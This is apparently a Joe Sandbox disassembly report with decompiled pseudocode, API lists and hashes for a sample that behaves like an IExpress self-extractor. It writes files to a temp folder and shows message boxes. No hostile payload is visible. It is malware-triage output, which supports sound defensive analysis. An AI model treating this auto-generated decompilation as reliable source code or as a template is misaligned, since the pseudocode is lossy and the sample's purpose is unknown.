                                                                                                                                                                                                                                            0x00a02a07
                                                                                                                                                                                                                                            0x00a02a0a
                                                                                                                                                                                                                                            0x00a02a0f
                                                                                                                                                                                                                                            0x00a02a19
                                                                                                                                                                                                                                            0x00a02a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02a0f
                                                                                                                                                                                                                                            0x00a0298c
                                                                                                                                                                                                                                            0x00a02974
                                                                                                                                                                                                                                            0x00a02962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0294f
                                                                                                                                                                                                                                            0x00a02912
                                                                                                                                                                                                                                            0x00a02a65
                                                                                                                                                                                                                                            0x00a02a68
                                                                                                                                                                                                                                            0x00a02a6c
                                                                                                                                                                                                                                            0x00a02a6f
                                                                                                                                                                                                                                            0x00a02a6f
                                                                                                                                                                                                                                            0x00a02a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00A02A6F
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharUpperA.USER32(E10713FE,00000000,00000000,00000000), ref: 00A027A8
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharNextA.USER32(0000054D), ref: 00A027B5
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: CharNextA.USER32(00000000), ref: 00A027BC
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02829
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegQueryValueExA.ADVAPI32(?,00A01140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02852
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A02870
                                                                                                                                                                                                                                              • Part of subcall function 00A02773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A028A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A03938,?,?,?,?,-00000005), ref: 00A02958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00A02969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A03938,?,?,?,?,-00000005,?), ref: 00A02A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A02A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 6c2b5fed15aef8c0576ef376a0944dcaeef12f2f1dde28971fb59a556aa8af45
                                                                                                                                                                                                                                            • Instruction ID: 94d88211ba34228dc83c1f498b813d4aba27b192717b8ccde1ee5654e8f71a24
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c2b5fed15aef8c0576ef376a0944dcaeef12f2f1dde28971fb59a556aa8af45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A511C31E0021DEFCB21DF98E888AAEFBB5FF48740F14416AE915E3251DB319941DB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E00A04169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E00A0468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E00A0468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E00A044B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046A0
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: SizeofResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046A9
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A046C3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LoadResource.KERNEL32(00000000,00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046CC
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: LockResource.KERNEL32(00000000,?,00A02D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046D3
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: memcpy_s.MSVCRT ref: 00A046E5
                                                                                                                                                                                                                                              • Part of subcall function 00A0468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A046EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A030B4), ref: 00A04189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A030B4), ref: 00A041E7
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 2feca83d8367a127e61556de9b4027a0e2670551494d36ea8ddc2a63f03d937b
                                                                                                                                                                                                                                            • Instruction ID: de4b7e2cd1a5ccb608c5f0bd702cbd69c1a4522739014850cc5c419446bd4b07
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2feca83d8367a127e61556de9b4027a0e2670551494d36ea8ddc2a63f03d937b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B401D1F130031C7BF3252A667C96FBB218EFBEC795F004229B706E11C09AA9CC0241B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                            					E00A043D0(_t34, _t15);
                                                                                                                                                                                                                                            					_v520 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa09a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                            					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if(_t14 != 1) {
                                                                                                                                                                                                                                            						L4:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t32 = _a12;
                                                                                                                                                                                                                                            						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							_t23 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a01a16
                                                                                                                                                                                                                                            0x00a01a18
                                                                                                                                                                                                                                            0x00a01a70
                                                                                                                                                                                                                                            0x00a01a72
                                                                                                                                                                                                                                            0x00a01a72
                                                                                                                                                                                                                                            0x00a01a14
                                                                                                                                                                                                                                            0x00a01a06
                                                                                                                                                                                                                                            0x00a01a81

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A01A18
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A01A24
                                                                                                                                                                                                                                            • LoadStringA.USER32(?,?,00000200), ref: 00A01A4F
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A01A62
                                                                                                                                                                                                                                            • MessageBeep.USER32(000000FF), ref: 00A01A6A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1273765764-0
                                                                                                                                                                                                                                            • Opcode ID: 00af7542c5da210b3a97bbb14a0b3ade4a13165b1c45639cf15196a985117393
                                                                                                                                                                                                                                            • Instruction ID: d5b0bbb0aa3991503cf02445fd24a92bb67142ff809d2419cd5d64592a1c10fd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00af7542c5da210b3a97bbb14a0b3ade4a13165b1c45639cf15196a985117393
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A11A13160120DAFDB10EFA8EE08AEE77B8FF59350F108254F916961D1DA349E03DB95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A07155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0xa08004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa08004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0xa08008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A07182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00A07191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00A0719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A071A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00A071B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 18b4ae4e655cda6f2047510d8c49c74ee24a78ca7d7ddd6725548cb9685db821
                                                                                                                                                                                                                                            • Instruction ID: 53a05d7381e3cb7d99dbc2c357ab2ac9bbced0d72c142ae94b4963fef31d1069
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18b4ae4e655cda6f2047510d8c49c74ee24a78ca7d7ddd6725548cb9685db821
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7113A71D0120CDBCB10DFF8EA48A9EB7F4EF18310F614A65D906E7250EA349A068F45
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                                                                                            			E00A063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				long _v272;
                                                                                                                                                                                                                                            				void* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t15;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            				signed int _t40;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t15 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                                                            				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_v276 = _a16;
                                                                                                                                                                                                                                            				_t37 = 1;
                                                                                                                                                                                                                                            				E00A01781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            				E00A0658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                            				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                                                            					_t28 = _a4;
                                                                                                                                                                                                                                            					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                                                            						 *0xa09124 = 0x80070052;
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					CloseHandle(_t39);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					 *0xa09124 = 0x80070052;
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A06CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0642D
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0645B
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0647A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A063EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 1065093856-3647970563
                                                                                                                                                                                                                                            • Opcode ID: 31ea3cd3b0e60d1d7ad317e12fe6ec893353c2cdba6a5e4cbb0592bd59c64fac
                                                                                                                                                                                                                                            • Instruction ID: af35a26c17d7d8417716961942f982e6a4a1865fac495a8ff974d24e78fca2f7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31ea3cd3b0e60d1d7ad317e12fe6ec893353c2cdba6a5e4cbb0592bd59c64fac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8721D271A0021CAFDB10DF65EC85FEB7378EB54314F0042A9F585A3280DBB06D968FA4
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A047E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                                                                                            				void _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t26;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				intOrPtr* _t28;
                                                                                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                            				if(_t34 != 0) {
                                                                                                                                                                                                                                            					_t22 = _t33;
                                                                                                                                                                                                                                            					_t27 = _t22 + 1;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t6 =  *_t22;
                                                                                                                                                                                                                                            						_t22 = _t22 + 1;
                                                                                                                                                                                                                                            					} while (_t6 != 0);
                                                                                                                                                                                                                                            					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                                                            					 *_t34 = _t24;
                                                                                                                                                                                                                                            					if(_t24 != 0) {
                                                                                                                                                                                                                                            						_t28 = _t33;
                                                                                                                                                                                                                                            						_t19 = _t28 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t9 =  *_t28;
                                                                                                                                                                                                                                            							_t28 = _t28 + 1;
                                                                                                                                                                                                                                            						} while (_t9 != 0);
                                                                                                                                                                                                                                            						E00A01680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                                                            						_t11 =  *0xa091e0; // 0x34e8ed0
                                                                                                                                                                                                                                            						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                                                            						 *0xa091e0 = _t34;
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t25 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            					E00A044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                            					LocalFree(_t34);
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 =  *0xa08584; // 0x0
                                                                                                                                                                                                                                            				E00A044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A04E6F), ref: 00A047EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00A04823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A04847
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A04851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-3647970563
                                                                                                                                                                                                                                            • Opcode ID: de91450d53bb1751fc199c9b9ebddbd383c5f7facf084e5f938808e363a060f1
                                                                                                                                                                                                                                            • Instruction ID: 286452fa1e6f1990ce3a37b36f447068416d5f0601d0b194620182bf5157e337
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: de91450d53bb1751fc199c9b9ebddbd383c5f7facf084e5f938808e363a060f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B611E3B5604649AFD7548F74AC18B723B5AFB89300F048919EB8297281DA369C0B8660
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A03680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
